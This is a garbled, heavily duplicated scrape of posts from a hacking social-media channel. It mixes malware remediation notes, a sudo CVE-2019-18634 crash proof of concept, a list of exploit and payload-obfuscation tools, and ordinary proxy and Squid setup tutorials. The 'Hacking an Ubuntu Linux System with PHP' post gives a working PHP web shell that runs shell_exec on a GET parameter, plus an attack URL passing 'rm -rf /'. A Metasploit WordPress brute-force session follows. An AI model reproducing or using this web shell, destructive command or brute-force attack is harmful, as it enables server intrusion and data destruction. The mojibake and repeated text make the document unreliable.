β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦ Third, block virus transmission and repair programs :
(special X-Red Virus )
t.me/UndercOdeTesting
π¦ ππΌππ πππΈβπ :
1) The company's IT staff immediately disconnected the infected machine from the network to prevent further spread.
2) After confirming that the computer housekeeper Cloud Master Defense can intercept the pathogen "Synaptics.exe", it immediately requested that computers without "Tencent T-sec Terminal Security Management System" be installed to install Tencent Computer Housekeeper.
3) The pathogen "Synaptics.exe" has more than 20,000 variants. The latest update was January 2020.
4) It is still active and it is recommended that companies upgrade anti-virus software in time to take precautions.
5) For infected computers, use Tencent Computer Manager (or Tencent T-sec Terminal Security Management System) to conduct a comprehensive check and repair of infected files. The XRed virus infection method is relatively special (for details, please refer to the "Detailed Analysis of Samples" section below). Tencent Computer Butler can accurately identify and repair it perfectly and restore the infected file to its original state.
@UndercOdeTesting
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦ Third, block virus transmission and repair programs :
(special X-Red Virus )
t.me/UndercOdeTesting
π¦ ππΌππ πππΈβπ :
1) The company's IT staff immediately disconnected the infected machine from the network to prevent further spread.
2) After confirming that the computer housekeeper Cloud Master Defense can intercept the pathogen "Synaptics.exe", it immediately requested that computers without "Tencent T-sec Terminal Security Management System" be installed to install Tencent Computer Housekeeper.
3) The pathogen "Synaptics.exe" has more than 20,000 variants. The latest update was January 2020.
4) It is still active and it is recommended that companies upgrade anti-virus software in time to take precautions.
5) For infected computers, use Tencent Computer Manager (or Tencent T-sec Terminal Security Management System) to conduct a comprehensive check and repair of infected files. The XRed virus infection method is relatively special (for details, please refer to the "Detailed Analysis of Samples" section below). Tencent Computer Butler can accurately identify and repair it perfectly and restore the infected file to its original state.
@UndercOdeTesting
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦ everyOne should take care from X-RED MALWARE, HIS ACTIVITY STARTED SINCE JAN 2020
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦2020 Vulnerabilty from twitter.com/UndercOdeTC
> Sudo vulnerability allows unprivileged Linux and macOS users to run commands as root
π¦ cyber-security-3400657_640
Sudo vulnerability allows unprivileged Linux and macOS users to run commands as root
Author: @UndercOdeOfficialn Date: 2020-02-04 Category: security alerts , vulnerability events
> Apple security expert Joe Vennix has discovered a vulnerability (CVE-2019-18634) that allows unprivileged Linux and macOS users to run commands as root.
> This vulnerability can only be exploited in special configurations.
> The vulnerability can only be exploited if the "pwfeedback" option has been enabled in the sudo configuration file. The pwfeedback option for root allows visual feedback when the user enters a password.
> Experts point out that this vulnerability can be triggered even if the user is not in the user file.
π¦ ππΌππ πππΈβπ :
1) "You do not need root privileges to trigger this vulnerability, you just need to enable pwfeedback." Sudo developer Todd C. Miller wrote.
2) "When entering the password, you can enter sudo through the pipe to reproduce it. For example:"
$ perl -e 'print (("A" x 100. "\ x {00}") x 50)' | sudo -S id
Password: Segmentation fault
There are two reasons for this vulnerability:
3) The pwfeedback option is generally not ignored when reading from devices other than the terminal device. Due to the lack of a terminal, the version of the line erase character is always an initial value of 0.
If there is a write error, the code that erases the asterisk line will not reset the buffer position correctly, but it will reset the remaining buffer length. This will cause the getln () function to be written outside the buffer. "
4) If this option is enabled, you can change "Defaults pwfeedback" to "Defaults! Pwfeedback" in the user profile.
5) The sudo maintainer released version 1.8.31 of root.
"Although there are logic errors in the 1.8.26 to 1.8.30 versions of sudo, the vulnerabilities could not be exploited due to changes in EOF processing after 1.8.26." Miller explained.
6) In October 2019, Vennix discovered a Sudo bypass issue. Even if "sudo user configuration" does not allow root access, a malicious user or malicious program can still execute arbitrary commands as the root user on the target Linux system, and this big is patched on undercode os today/and in debian yesterday
Written by UndercOde
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦2020 Vulnerabilty from twitter.com/UndercOdeTC
> Sudo vulnerability allows unprivileged Linux and macOS users to run commands as root
π¦ cyber-security-3400657_640
Sudo vulnerability allows unprivileged Linux and macOS users to run commands as root
Author: @UndercOdeOfficialn Date: 2020-02-04 Category: security alerts , vulnerability events
> Apple security expert Joe Vennix has discovered a vulnerability (CVE-2019-18634) that allows unprivileged Linux and macOS users to run commands as root.
> This vulnerability can only be exploited in special configurations.
> The vulnerability can only be exploited if the "pwfeedback" option has been enabled in the sudo configuration file. The pwfeedback option for root allows visual feedback when the user enters a password.
> Experts point out that this vulnerability can be triggered even if the user is not in the user file.
π¦ ππΌππ πππΈβπ :
1) "You do not need root privileges to trigger this vulnerability, you just need to enable pwfeedback." Sudo developer Todd C. Miller wrote.
2) "When entering the password, you can enter sudo through the pipe to reproduce it. For example:"
$ perl -e 'print (("A" x 100. "\ x {00}") x 50)' | sudo -S id
Password: Segmentation fault
There are two reasons for this vulnerability:
3) The pwfeedback option is generally not ignored when reading from devices other than the terminal device. Due to the lack of a terminal, the version of the line erase character is always an initial value of 0.
If there is a write error, the code that erases the asterisk line will not reset the buffer position correctly, but it will reset the remaining buffer length. This will cause the getln () function to be written outside the buffer. "
4) If this option is enabled, you can change "Defaults pwfeedback" to "Defaults! Pwfeedback" in the user profile.
5) The sudo maintainer released version 1.8.31 of root.
"Although there are logic errors in the 1.8.26 to 1.8.30 versions of sudo, the vulnerabilities could not be exploited due to changes in EOF processing after 1.8.26." Miller explained.
6) In October 2019, Vennix discovered a Sudo bypass issue. Even if "sudo user configuration" does not allow root access, a malicious user or malicious program can still execute arbitrary commands as the root user on the target Linux system, and this big is patched on undercode os today/and in debian yesterday
Written by UndercOde
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦TOP EXTREMLY DAGEROUS HACKING TOOLS/ accounts-cards-modding... TERMUX-KALI-PARROT...
> EXPLOITE TOOLS 2019-2020
t.me/UndercOdeTesting
π¦ ππΌππ πππΈβπ :
1) WinRAR Remote Code Execution Proof of Concept exploit for CVE-2018-20250. https://github.com/WyAtu/CVE-2018-20250
2) Composite Moniker Proof of Concept exploit for CVE-2017-8570. https://github.com/rxwx/CVE-2017-8570
3) Exploit toolkit CVE-2017-8759 is a handy python script which provides pentesters and security researchers a quick and effective way to test
4) Microsoft .NET Framework RCE. https://github.com/bhdresh/CVE-2017-8759
CVE-2017-11882 Exploit accepts over 17k bytes long command/code in maximum. https://github.com/unamer/CVE-2017-11882
5) Adobe Flash Exploit CVE-2018-4878. https://github.com/anbai-inc/CVE-2018-4878
6) Exploit toolkit CVE-2017-0199 is a handy python script which provides pentesters and security researchers a quick and effective way to test
7) Microsoft Office RCE. https://github.com/bhdresh/CVE-2017-0199
demiguise is a HTA encryption tool for RedTeams. https://github.com/nccgroup/demiguise
8) Office-DDE-Payloads collection of scripts and templates to generate Office documents embedded with the DDE, macro-less command execution technique. https://github.com/0xdeadbeefJERKY/Office-DDE-Payloads
9) CACTUSTORCH Payload Generation for Adversary Simulations. https://github.com/mdsecactivebreach/CACTUSTORCH
10) SharpShooter is a payload creation framework for the retrieval and execution of arbitrary CSharp source code. https://github.com/mdsecactivebreach/SharpShooter
11) Don't kill my cat is a tool that generates obfuscated shellcode that is stored inside of polyglot images. The image is 100% valid and also 100% valid shellcode. https://github.com/Mr-Un1k0d3r/DKMC
12) Malicious Macro Generator Utility Simple utility design to generate obfuscated macro that also include a AV / Sandboxes escape
mechanism. https://github.com/Mr-Un1k0d3r/
13) MaliciousMacroGenerator
SCT Obfuscator Cobalt Strike SCT payload obfuscator. https://github.com/Mr-Un1k0d3r/SCT-obfuscator
@UndercOdeTesting
14) Invoke-Obfuscation PowerShell Obfuscator. https://github.com/danielbohannon/Invoke-Obfuscation
15) Invoke-CradleCrafter PowerShell remote download cradle generator and obfuscator. https://github.com/danielbohannon/Invoke-CradleCrafter
16) Invoke-DOSfuscation cmd.exe Command Obfuscation Generator & Detection Test Harness. https://github.com/danielbohannon/Invoke-DOSfuscation
17) morphHTA Morphing Cobalt Strike's evil.HTA. https://github.com/vysec/morphHTA
Unicorn is a simple tool for using a PowerShell downgrade attack and
18) inject shellcode straight into memory. https://github.com/trustedsec/unicorn
U S E FOR Learning Only !!!!
@UndercOdeOfficial
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦TOP EXTREMLY DAGEROUS HACKING TOOLS/ accounts-cards-modding... TERMUX-KALI-PARROT...
> EXPLOITE TOOLS 2019-2020
t.me/UndercOdeTesting
π¦ ππΌππ πππΈβπ :
1) WinRAR Remote Code Execution Proof of Concept exploit for CVE-2018-20250. https://github.com/WyAtu/CVE-2018-20250
2) Composite Moniker Proof of Concept exploit for CVE-2017-8570. https://github.com/rxwx/CVE-2017-8570
3) Exploit toolkit CVE-2017-8759 is a handy python script which provides pentesters and security researchers a quick and effective way to test
4) Microsoft .NET Framework RCE. https://github.com/bhdresh/CVE-2017-8759
CVE-2017-11882 Exploit accepts over 17k bytes long command/code in maximum. https://github.com/unamer/CVE-2017-11882
5) Adobe Flash Exploit CVE-2018-4878. https://github.com/anbai-inc/CVE-2018-4878
6) Exploit toolkit CVE-2017-0199 is a handy python script which provides pentesters and security researchers a quick and effective way to test
7) Microsoft Office RCE. https://github.com/bhdresh/CVE-2017-0199
demiguise is a HTA encryption tool for RedTeams. https://github.com/nccgroup/demiguise
8) Office-DDE-Payloads collection of scripts and templates to generate Office documents embedded with the DDE, macro-less command execution technique. https://github.com/0xdeadbeefJERKY/Office-DDE-Payloads
9) CACTUSTORCH Payload Generation for Adversary Simulations. https://github.com/mdsecactivebreach/CACTUSTORCH
10) SharpShooter is a payload creation framework for the retrieval and execution of arbitrary CSharp source code. https://github.com/mdsecactivebreach/SharpShooter
11) Don't kill my cat is a tool that generates obfuscated shellcode that is stored inside of polyglot images. The image is 100% valid and also 100% valid shellcode. https://github.com/Mr-Un1k0d3r/DKMC
12) Malicious Macro Generator Utility Simple utility design to generate obfuscated macro that also include a AV / Sandboxes escape
mechanism. https://github.com/Mr-Un1k0d3r/
13) MaliciousMacroGenerator
SCT Obfuscator Cobalt Strike SCT payload obfuscator. https://github.com/Mr-Un1k0d3r/SCT-obfuscator
@UndercOdeTesting
14) Invoke-Obfuscation PowerShell Obfuscator. https://github.com/danielbohannon/Invoke-Obfuscation
15) Invoke-CradleCrafter PowerShell remote download cradle generator and obfuscator. https://github.com/danielbohannon/Invoke-CradleCrafter
16) Invoke-DOSfuscation cmd.exe Command Obfuscation Generator & Detection Test Harness. https://github.com/danielbohannon/Invoke-DOSfuscation
17) morphHTA Morphing Cobalt Strike's evil.HTA. https://github.com/vysec/morphHTA
Unicorn is a simple tool for using a PowerShell downgrade attack and
18) inject shellcode straight into memory. https://github.com/trustedsec/unicorn
U S E FOR Learning Only !!!!
@UndercOdeOfficial
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦ Hacking an Ubuntu Linux System with PHP :
instagram.com/UnderCodeTesting
π¦ ππΌππ πππΈβπ :
> In this practical scenario, we will provide you with basic information on how to use PHP to disrupt Linux.
> We will not target any victims. If you want to try it out, you can install LAMPP on your local computer.
1) PHP comes with two functions that can be used to execute Linux commands. It has exec () and shell_exec () functions. The function exec () returns the last line of command output, while shell_exec () returns the entire result of the command as a string.
2) For demonstration purposes, let us assume that the attacker administrator uploads the following files on a web server.
<? PHP $ cmd = isset ($ _ GET ['cmd'])? $ _GET ['cmd']: 'ls -l'; echo "execute a shell command:-> $ cmd </ br>"; $ output = shell_exec ($ cmd); echo "
<pre> $ output </ pre> ";? > Here above script gets commands from the GET variable named cmd in. The command is executed using shell_exec () and returns the result in the browser. You can use the above code HTTP using the following URL : //localhost/cp/konsole.php CMD = LS% 20 liters
3) "... konsole.php? Cmd = ls% 20-l" assigns the value ls -l to the variable cmd .
The command executed against the server will be
4) See That Picture By UndercODE
> The above command only shows the files and permissions in the current directory.
Assuming the attacker passes the command
rm -rf /
here,
"Rm" delete file
"Rf" causes the rm command to run in recursive mode. Delete all folders and files
"/" Instructs the command to start deleting files from the root directory
The attack URL looks like this
HTTP: //localhost/cp/konsole.php CMD = RM% 20-RF% 20 /
written by UndercOde
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦ Hacking an Ubuntu Linux System with PHP :
instagram.com/UnderCodeTesting
π¦ ππΌππ πππΈβπ :
> In this practical scenario, we will provide you with basic information on how to use PHP to disrupt Linux.
> We will not target any victims. If you want to try it out, you can install LAMPP on your local computer.
1) PHP comes with two functions that can be used to execute Linux commands. It has exec () and shell_exec () functions. The function exec () returns the last line of command output, while shell_exec () returns the entire result of the command as a string.
2) For demonstration purposes, let us assume that the attacker administrator uploads the following files on a web server.
<? PHP $ cmd = isset ($ _ GET ['cmd'])? $ _GET ['cmd']: 'ls -l'; echo "execute a shell command:-> $ cmd </ br>"; $ output = shell_exec ($ cmd); echo "
<pre> $ output </ pre> ";? > Here above script gets commands from the GET variable named cmd in. The command is executed using shell_exec () and returns the result in the browser. You can use the above code HTTP using the following URL : //localhost/cp/konsole.php CMD = LS% 20 liters
3) "... konsole.php? Cmd = ls% 20-l" assigns the value ls -l to the variable cmd .
The command executed against the server will be
4) See That Picture By UndercODE
> The above command only shows the files and permissions in the current directory.
Assuming the attacker passes the command
rm -rf /
here,
"Rm" delete file
"Rf" causes the rm command to run in recursive mode. Delete all folders and files
"/" Instructs the command to start deleting files from the root directory
The attack URL looks like this
HTTP: //localhost/cp/konsole.php CMD = RM% 20-RF% 20 /
written by UndercOde
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦Web Hacking/ Wordpress- Brute force attack using metasploit
fb.com/UndercOdeTestingCompany
π¦ ππΌππ πππΈβπ :
1) This module will test WordPress logins on a series of computers and report successful logins.
2) If you have loaded the database plugin and connected to the database of this module, it will log successful logins and hosts so you can track your visits.
msf>useauxiliary/scanner/http/wordpress_login_enummsfauxiliary(wordpress_login_enum)>setrhosts192.168.1.4msfauxiliary(wordpress_login_enum)>setrport80msfauxiliary(wordpress_login_enum)>setuser_file/root/
> Desktop / user . Txt
msf auxiliary ( wordpress_login_enum ) > set pass_file / root / Desktop / pass . Txt msf auxiliary ( wordpress_login_enum ) > exploit WordPress brute force successful login user: bitnami as the username and password.
written by UndercOde
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦Web Hacking/ Wordpress- Brute force attack using metasploit
fb.com/UndercOdeTestingCompany
π¦ ππΌππ πππΈβπ :
1) This module will test WordPress logins on a series of computers and report successful logins.
2) If you have loaded the database plugin and connected to the database of this module, it will log successful logins and hosts so you can track your visits.
msf>useauxiliary/scanner/http/wordpress_login_enummsfauxiliary(wordpress_login_enum)>setrhosts192.168.1.4msfauxiliary(wordpress_login_enum)>setrport80msfauxiliary(wordpress_login_enum)>setuser_file/root/
> Desktop / user . Txt
msf auxiliary ( wordpress_login_enum ) > set pass_file / root / Desktop / pass . Txt msf auxiliary ( wordpress_login_enum ) > exploit WordPress brute force successful login user: bitnami as the username and password.
written by UndercOde
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦ What is a proxy server
twitter.com/UndercOdeTC
in the TCP / IP network, the traditional communication process is this:
1) the client requests data to the server, the server response Data should be transmitted to the client upon request.
2) After the introduction of the proxy server, the process becomes like this: the client initiates a request to the server, and the request is sent to the proxy server; the proxy server analyzes the request, and first checks whether there is request data in its cache, and directly Transfer to the client, if not, make a request to the server on behalf of the client.
3) After the server responds, the proxy server transmits the response data to the client, while keeping a copy of the data in its own cache. In this way, when another client requests the same data, the proxy server can directly transmit the data to the client without having to initiate a request to the server.
written by UndercOde
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦ What is a proxy server
twitter.com/UndercOdeTC
in the TCP / IP network, the traditional communication process is this:
1) the client requests data to the server, the server response Data should be transmitted to the client upon request.
2) After the introduction of the proxy server, the process becomes like this: the client initiates a request to the server, and the request is sent to the proxy server; the proxy server analyzes the request, and first checks whether there is request data in its cache, and directly Transfer to the client, if not, make a request to the server on behalf of the client.
3) After the server responds, the proxy server transmits the response data to the client, while keeping a copy of the data in its own cache. In this way, when another client requests the same data, the proxy server can directly transmit the data to the client without having to initiate a request to the server.
written by UndercOde
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦ Features Of Proxy Server :
instagram.com/UndercOdeTestingCompany
π¦ ππΌππ πππΈβπ :
> Generally speaking, the proxy server has the following features:
1) increase access speed by caching
> With the rapid development of Internet, network bandwidth is becoming increasingly rare. Therefore, in order to improve the access speed, many ISPs provide proxy servers, which use the cache function of the proxy server to speed up the network access speed. Generally speaking, most proxy servers support HTTP caching, but some proxy servers also support FTP caching. When choosing a proxy server, for most organizations, only HTTP caching is sufficient.
Generally, caches are classified as active caches and passive caches. The so-called passive cache means that the proxy server caches the data returned by the server only when the client requests data. If the data expires and the client requests the same data, the proxy server must re-initiate a new data request. When the response data is transmitted to the client, a new cache is performed. The so-called active cache means that the proxy server continuously checks the data in the cache. Once the data expires, the proxy server actively initiates a new data request to update the data. In this way, when a client requests the data, the response time is greatly reduced. It should also be noted that most proxy servers do not cache the authentication information in the data.
2) Provide a method for accessing the Internet with a private IP.
IP addresses are valuable resources that are not renewable. If you have only limited IP addresses but need to provide Internet access for the entire organization, then you can achieve this by using a proxy server.
3) To improve network security
This is very clear, if all internal users to access the Internet through a proxy server, then the proxy server will become the only channel into the Internet; conversely, the proxy server is the only Internet access to internal network Channel, if you do not do reverse proxy, for the host on the Internet, only the proxy server of your entire intranet is visible, which greatly enhances the security of the network.
written by UndercOde
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦ Features Of Proxy Server :
instagram.com/UndercOdeTestingCompany
π¦ ππΌππ πππΈβπ :
> Generally speaking, the proxy server has the following features:
1) increase access speed by caching
> With the rapid development of Internet, network bandwidth is becoming increasingly rare. Therefore, in order to improve the access speed, many ISPs provide proxy servers, which use the cache function of the proxy server to speed up the network access speed. Generally speaking, most proxy servers support HTTP caching, but some proxy servers also support FTP caching. When choosing a proxy server, for most organizations, only HTTP caching is sufficient.
Generally, caches are classified as active caches and passive caches. The so-called passive cache means that the proxy server caches the data returned by the server only when the client requests data. If the data expires and the client requests the same data, the proxy server must re-initiate a new data request. When the response data is transmitted to the client, a new cache is performed. The so-called active cache means that the proxy server continuously checks the data in the cache. Once the data expires, the proxy server actively initiates a new data request to update the data. In this way, when a client requests the data, the response time is greatly reduced. It should also be noted that most proxy servers do not cache the authentication information in the data.
2) Provide a method for accessing the Internet with a private IP.
IP addresses are valuable resources that are not renewable. If you have only limited IP addresses but need to provide Internet access for the entire organization, then you can achieve this by using a proxy server.
3) To improve network security
This is very clear, if all internal users to access the Internet through a proxy server, then the proxy server will become the only channel into the Internet; conversely, the proxy server is the only Internet access to internal network Channel, if you do not do reverse proxy, for the host on the Internet, only the proxy server of your entire intranet is visible, which greatly enhances the security of the network.
written by UndercOde
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦ Classification and characteristics of the proxy server :
fb.com/UndercOdeTestingCompany
π¦ ππΌππ πππΈβπ :
> is usually a proxy server classification is divided into circuit layer proxy application layer proxy, intelligent circuit layer proxy, etc. from the mechanism of implementation. Here, I want to start from another angle and divide proxy servers into traditional proxy servers and transparent proxy servers.
1) the biggest gain from reading this article is that I have a clear understanding of the implementation methods of intranet access to the extranet and extranet access to the intranet.
> the so-called intranet here refers to the internal network using private IP.
2) Our examples are based on the following assumptions:
your domain name is sample.com, and your intranet (192.168.1. *) Users pass proxy.sample.com (external interface eth0: 1.2.3.4; internal interface eth1: 192.168.1.1 )
3) The proxy server accesses the Internet. In other words, the proxy server is the only machine directly connected to the Internet and the intranet. It is assumed that some proxy server software (such as squid) is running on the proxy server. Assume that a client in the intranet is client.sample.com (192.168.1.100).
+ ------------------- +
| Intranet (192.168.1. *) | Eth1 + -------- + eth0 DDN
| + ---- -------- | proxy | <================> Internet
| client198.168.1.100 | + -------- +
+ --- + ----------------
eth0: 1.2.3.4
eth1: 198.168.1.1
written by UndercOde
β β β ο½ππ»βΊπ«Δπ¬πβ β β
π¦ Classification and characteristics of the proxy server :
fb.com/UndercOdeTestingCompany
π¦ ππΌππ πππΈβπ :
> is usually a proxy server classification is divided into circuit layer proxy application layer proxy, intelligent circuit layer proxy, etc. from the mechanism of implementation. Here, I want to start from another angle and divide proxy servers into traditional proxy servers and transparent proxy servers.
1) the biggest gain from reading this article is that I have a clear understanding of the implementation methods of intranet access to the extranet and extranet access to the intranet.
> the so-called intranet here refers to the internal network using private IP.
2) Our examples are based on the following assumptions:
your domain name is sample.com, and your intranet (192.168.1. *) Users pass proxy.sample.com (external interface eth0: 1.2.3.4; internal interface eth1: 192.168.1.1 )
3) The proxy server accesses the Internet. In other words, the proxy server is the only machine directly connected to the Internet and the intranet. It is assumed that some proxy server software (such as squid) is running on the proxy server. Assume that a client in the intranet is client.sample.com (192.168.1.100).
+ ------------------- +
| Intranet (192.168.1. *) | Eth1 + -------- + eth0 DDN
| + ---- -------- | proxy | <================> Internet
| client198.168.1.100 | + -------- +
+ --- + ----------------
eth0: 1.2.3.4
eth1: 198.168.1.1
written by UndercOde
β β β ο½ππ»βΊπ«Δπ¬πβ β β
β β β ο½ππ»βΊπ«Δπ¬πβ β ββ
π¦traditional agency example Configuration and application of proxy server
pinterest.com/UndercodeOfficial
π¦ ππΌππ πππΈβπ :
π¦ based on the above we do the following:
1) The proxy service software is bound to port 8080 of the proxy server.
2) The client browser is configured to use port 8080 of the proxy server.
3) The client does not need to configure DNS.
4) A proxy server needs to be configured on the proxy server.
5) The client does not need to configure a default route.
π¦ When we open a web request in the client browser, such as " http://www.yourdomain.com ", the following events will occur successively:
1) The client uses a certain port (such as 1025) to connect to the proxy server 8080 Port, request the web page " http://www.yourdomain.com "
2) The proxy server requests "www.yourdomain.com" from the DNS to get the corresponding IP address 202.99.11.120. Then, the proxy server uses a certain port (such as 1037) to initiate a web connection request to port 80 of the IP address, requesting a web page.
3) After receiving the response web page, the proxy server transmits the data to the client.
4) The client browser displays the page.
From the perspective of www.yourdomain.com, the connection is established between port 1037 at 1.2.3.4 and port 80 at 202.99.11.120. From the client's perspective, the connection is established between port 1025 at 192.168.1.100 and port 8080 at 1.2.3.4.
written by UndercOde
β β β ο½ππ»βΊπ«Δπ¬πβ β ββ
π¦traditional agency example Configuration and application of proxy server
pinterest.com/UndercodeOfficial
π¦ ππΌππ πππΈβπ :
π¦ based on the above we do the following:
1) The proxy service software is bound to port 8080 of the proxy server.
2) The client browser is configured to use port 8080 of the proxy server.
3) The client does not need to configure DNS.
4) A proxy server needs to be configured on the proxy server.
5) The client does not need to configure a default route.
π¦ When we open a web request in the client browser, such as " http://www.yourdomain.com ", the following events will occur successively:
1) The client uses a certain port (such as 1025) to connect to the proxy server 8080 Port, request the web page " http://www.yourdomain.com "
2) The proxy server requests "www.yourdomain.com" from the DNS to get the corresponding IP address 202.99.11.120. Then, the proxy server uses a certain port (such as 1037) to initiate a web connection request to port 80 of the IP address, requesting a web page.
3) After receiving the response web page, the proxy server transmits the data to the client.
4) The client browser displays the page.
From the perspective of www.yourdomain.com, the connection is established between port 1037 at 1.2.3.4 and port 80 at 202.99.11.120. From the client's perspective, the connection is established between port 1025 at 192.168.1.100 and port 8080 at 1.2.3.4.
written by UndercOde
β β β ο½ππ»βΊπ«Δπ¬πβ β ββ
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦ Transparent Proxy :
twitter.com/UndercOdeTC
Transparent proxy means that clients do not need to know the existence of the proxy server.
Based on the above we do the following:
1) Configure the transparent proxy server software to run on port 8080 of the proxy server.
2) Configure the proxy server to redirect all connections to port 80 to port 8080.
3) Configure the client browser to connect directly to the Internet.
4) Configure DNS on the client.
5) Configure the client's default gateway to 192.168.1.1.
> When we open a web request in the client browser, such as " http://www.yourdomain.com ", at this time The following events will occur one after another:
1) The client requests "www.yourdomain.com" from DNS and obtains the corresponding IP address 202.99.11.120. Then, the client uses a certain port (such as 1066) to initiate a web connection request to port 80 of the IP address, requesting a web page.
2) When the request packet passes through the transparent proxy server, it is redirected to the bound port 8080 of the proxy server. Therefore, the transparent proxy server uses a certain port (such as 1088) to initiate a web connection request to port 80 of 202.99.11.120 to request a web page.
3) After receiving the response web page, the proxy server transmits the data to the client.
4) The client browser displays the page.
From the perspective of www.yourdomain.com, the connection is established between port 1088 at port 1.2.3.4 and port 80 at 202.99.11.120. From the client's perspective, the connection is established between port 1066 at 192.168.1.100 and port 80 at 202.99.11.120.
π¦ The above is the difference between a traditional proxy server and a transparent proxy server.
Comparison of various proxy servers
There are many proxy server software under linux. I checked it from www.freshmeat.com (a famous linux software site), and there are more than sixty. However, only Apache, socks, squid, etc., which have been widely used, have proven to be high-performance proxy software
@ Steaven
β β β ο½ππ»βΊπ«Δπ¬πβ β ββ
π¦ Transparent Proxy :
twitter.com/UndercOdeTC
Transparent proxy means that clients do not need to know the existence of the proxy server.
Based on the above we do the following:
1) Configure the transparent proxy server software to run on port 8080 of the proxy server.
2) Configure the proxy server to redirect all connections to port 80 to port 8080.
3) Configure the client browser to connect directly to the Internet.
4) Configure DNS on the client.
5) Configure the client's default gateway to 192.168.1.1.
> When we open a web request in the client browser, such as " http://www.yourdomain.com ", at this time The following events will occur one after another:
1) The client requests "www.yourdomain.com" from DNS and obtains the corresponding IP address 202.99.11.120. Then, the client uses a certain port (such as 1066) to initiate a web connection request to port 80 of the IP address, requesting a web page.
2) When the request packet passes through the transparent proxy server, it is redirected to the bound port 8080 of the proxy server. Therefore, the transparent proxy server uses a certain port (such as 1088) to initiate a web connection request to port 80 of 202.99.11.120 to request a web page.
3) After receiving the response web page, the proxy server transmits the data to the client.
4) The client browser displays the page.
From the perspective of www.yourdomain.com, the connection is established between port 1088 at port 1.2.3.4 and port 80 at 202.99.11.120. From the client's perspective, the connection is established between port 1066 at 192.168.1.100 and port 80 at 202.99.11.120.
π¦ The above is the difference between a traditional proxy server and a transparent proxy server.
Comparison of various proxy servers
There are many proxy server software under linux. I checked it from www.freshmeat.com (a famous linux software site), and there are more than sixty. However, only Apache, socks, squid, etc., which have been widely used, have proven to be high-performance proxy software
@ Steaven
β β β ο½ππ»βΊπ«Δπ¬πβ β ββ
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦ More About Proxie Work Like Expert :
instagram.com/UndercOdeTestingCompany
As can be seen from the above comparison, Apache web server main function is, the proxy function is only one of its modules only, Socks powerful, but inflexible, so we recommend that you focus on the use Squid. In the following chapters, we will learn about Squid's exciting features and related installation and configuration.
π¦ Now install Proxy Server Squid
A) acquisition software
you can get the software in the following ways:
1) From the official site of Squid http://www.squid-cache.org download the software;
2) From your linux release Obtain the software;
Generally, there are two types of Squid packages: one is the source code, which needs to be recompiled after downloading; the executable file can be used after decompression after downloading; the other is the rpm package used by RedHat. Below we talk about the installation methods of these two software packages.
B) Installing the software
we present the latest stable version of squid-2.3.STABLEX example.
3.2.1rpm package installation
1) Go to / mnt / cdrom / RedHat / RPMS
2) Run rpm -ivh squid-2.2.STABLE4-8.i386.rpm.
Of course, we can also install the software during the process of
π¦ installing the system.
C) Installation of Source Code Package
1) Download squid-2.3.STABLE2-src.tar.gz from http://www.squid-cache.org .
2) Copy the file to the / usr / local directory.
3) Unzip the file tar xvzf squid-2.3.STABLE2-src.tar.gz.
4) After unzipping, generate a new directory squid-2.3.STABLE2 in / usr / local. For convenience, use the mv command to rename the directory squid-2.3.STABLE2 squid;
5)Enter squid cd squid
6) ./configure can be performed ./confgure --prefix = / directory / you / want installation directory specified
default installation directory / usr / local / squid.
7) Execute make all
8) Execute make install
9) After installation, Squid's executable file is in the bin subdirectory of the installation directory, and the configuration file is in the etc subdirectory.
Written by UndercOde
β β β ο½ππ»βΊπ«Δπ¬πβ β ββ
π¦ More About Proxie Work Like Expert :
instagram.com/UndercOdeTestingCompany
As can be seen from the above comparison, Apache web server main function is, the proxy function is only one of its modules only, Socks powerful, but inflexible, so we recommend that you focus on the use Squid. In the following chapters, we will learn about Squid's exciting features and related installation and configuration.
π¦ Now install Proxy Server Squid
A) acquisition software
you can get the software in the following ways:
1) From the official site of Squid http://www.squid-cache.org download the software;
2) From your linux release Obtain the software;
Generally, there are two types of Squid packages: one is the source code, which needs to be recompiled after downloading; the executable file can be used after decompression after downloading; the other is the rpm package used by RedHat. Below we talk about the installation methods of these two software packages.
B) Installing the software
we present the latest stable version of squid-2.3.STABLEX example.
3.2.1rpm package installation
1) Go to / mnt / cdrom / RedHat / RPMS
2) Run rpm -ivh squid-2.2.STABLE4-8.i386.rpm.
Of course, we can also install the software during the process of
π¦ installing the system.
C) Installation of Source Code Package
1) Download squid-2.3.STABLE2-src.tar.gz from http://www.squid-cache.org .
2) Copy the file to the / usr / local directory.
3) Unzip the file tar xvzf squid-2.3.STABLE2-src.tar.gz.
4) After unzipping, generate a new directory squid-2.3.STABLE2 in / usr / local. For convenience, use the mv command to rename the directory squid-2.3.STABLE2 squid;
5)Enter squid cd squid
6) ./configure can be performed ./confgure --prefix = / directory / you / want installation directory specified
default installation directory / usr / local / squid.
7) Execute make all
8) Execute make install
9) After installation, Squid's executable file is in the bin subdirectory of the installation directory, and the configuration file is in the etc subdirectory.
Written by UndercOde
β β β ο½ππ»βΊπ«Δπ¬πβ β ββ
π¦ AFTER THOSE TUTORIALS YOU ARE ABLE TO KNOW EVERYTHING RELATED TO Configuration and application of proxy server
β β β ο½ππ»βΊπ«Δπ¬πβ β ββ
π¦ Configuration and applicacommon configuration options
because the default configuration file in question, we must first amend the contents of the configuration file in order to allow squid up and running.
instagram.com/UndercOdeTestingCompany
